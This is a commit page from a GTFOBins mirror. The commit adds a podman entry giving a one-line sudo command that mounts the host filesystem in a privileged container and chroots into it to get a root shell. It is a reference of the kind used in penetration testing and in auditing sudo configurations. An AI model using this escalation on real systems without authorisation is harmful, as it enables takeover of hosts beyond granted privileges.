1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-28 01:56:02 +02:00
This commit is contained in:
locaIhost 2024-04-24 13:27:17 +08:00 committed by GitHub
commit c8ea29f0c1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

6
_gtfobins/podman.md Normal file
View File

@ -0,0 +1,6 @@
---
functions:
sudo:
- description: The resulting is a root shell.
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
---